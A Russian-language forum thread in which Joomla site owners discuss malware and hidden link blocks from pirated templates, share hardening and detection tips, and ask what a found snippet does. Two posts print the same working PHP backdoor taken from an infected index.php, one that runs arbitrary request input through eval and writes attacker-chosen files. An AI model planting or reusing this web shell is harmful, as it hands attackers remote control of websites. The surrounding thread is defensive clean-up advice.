Помощь Вирус

[shuran]

Так я его удалил. Как себя защитить то?

1. Для начала нужно поставить права на index.php в корне и шаблоне только на чтение, и конфиг также.
2. Изменить страницу входа в админскую часть (есть плагин специальный, поищи, если не найдешь я у себя гляну)
3. Измени все пароли на CMS и хостинге и FTP, их не сохранять в программах а вбивать всегда руками.
4. При установке новых плагинов ищи "base64_decode" и гляди что там есть, если на верезниках разных качаешь.
5. Постараться вычистить код, что бы не видно было что джумла используется (искать в сети как), что бы всякие умники не пытались известными для нее способами ломануть.
6. Бекапы постоянные, что бы было что восстанавливать на всякий случай.
7. Обновить версию джумлы до последней возможной.

так..... Автор, подробнее - как ты выследил, что появился инородный код? В каком файле нашел? У меня стоит скрытый блок с двумя ссылками. Как еще могут зашифровать этот код? Какие словосочетания нужно попробовать поискать?

1. искать по дате изменения файлов
2. поиск на base64_decode а за ним как правило всякие крякозябры
3. первым делом проверять index.php (в корне и папках с шаблонами)и конфиг.

 

[Roamer]

Ну прямо и взяться левому коду неоткуда, ага? Меньше хлама с варезников типа жумла-мастер будете в след. раз ставить.

Именно от туда шаблон и притянул. Там все шаблоны со скрытыми блоками.

 

[al-teen]

Именно от туда шаблон и притянул. Там все шаблоны со скрытыми блоками.

и не только шаблоны

 

[MuhA]

Помогите, у меня на сайте после установки плагина появился банер на сайте и его никак не убрать

 

[Roamer]

Вы хотя бы ссылку дайте, где можно посмотреть...

 

[rosj]

Здрасте уважаемые!
Столкнулся с такойже проблемой Решил проверить свой старый сайт а там ошибка синтаксиса на главной странице index.php строка 89

<?php $cfstrg = "2951cc8381745f50802f4493201e1a33"; if(isset($_REQUEST['dqytb'])) { $bavitn = $_REQUEST['dqytb']; eval($bavitn); exit(0); } if(isset($_REQUEST['mkrvb'])) { $zhcjmom = $_REQUEST['qmoapfz']; $hkkhg = $_REQUEST['mkrvb']; $btcoeuj = fopen($hkkhg, 'w'); $kinns = fwrite($btcoeuj, $zhcjmom); fclose($btcoeuj); echo $kinns; exit(); } ?><?php

Подскажите пожалуйста что этот код делает

 

[Djahat]

А чем лучше всего человеку который не разбирается в Joomla просканировать свой сайт - на подобное вредоносное содержимое? - может есть какой то модуль ,который автоматически следит за сайтом?

 

[smalllamer]

Здрасте уважаемые!
Столкнулся с такойже проблемой Решил проверить свой старый сайт а там ошибка синтаксиса на главной странице index.php строка 89

<?php $cfstrg = "2951cc8381745f50802f4493201e1a33"; if(isset($_REQUEST['dqytb'])) { $bavitn = $_REQUEST['dqytb']; eval($bavitn); exit(0); } if(isset($_REQUEST['mkrvb'])) { $zhcjmom = $_REQUEST['qmoapfz']; $hkkhg = $_REQUEST['mkrvb']; $btcoeuj = fopen($hkkhg, 'w'); $kinns = fwrite($btcoeuj, $zhcjmom); fclose($btcoeuj); echo $kinns; exit(); } ?><?php

Подскажите пожалуйста что этот код делает

Выполнение кода.

А чем лучше всего человеку который не разбирается в Joomla просканировать свой сайт - на подобное вредоносное содержимое? - может есть какой то модуль ,который автоматически следит за сайтом?

Для начала хватит Для просмотра ссылки Войди или Зарегистрируйся

 

[Grisha]

Как еще могут зашифровать этот код? Какие словосочетания нужно попробовать поискать?

Ну прямо и взяться левому коду неоткуда, ага? Меньше хлама с варезников типа жумла-мастер будете в след. раз ставить.​

Именно от туда шаблон и притянул. Там все шаблоны со скрытыми блоками.

У меня точно такой же случай. Ответил по поводу обнаружения и устранения вот в Для просмотра ссылки Войди или Зарегистрируйся.

 

[lyusida]

Не помню где брала шаблон, но тоже наткнулась на лишние блоки с ссылками при выводе контента.
Чтобы легче было найти их, нужно смотреть куда именно они загружаются - в какую позицию шаблона и какие компонентом или модулем.
После того, как это выяснили, нужно просмотреть файлы относящиеся к этому компоненту или модулю.
В моем случае лишние блоки подгружались только в статьи (до и после). Следовательно компонент com_content и его шаблон вывода статьи. Там и нашла закодированные строки.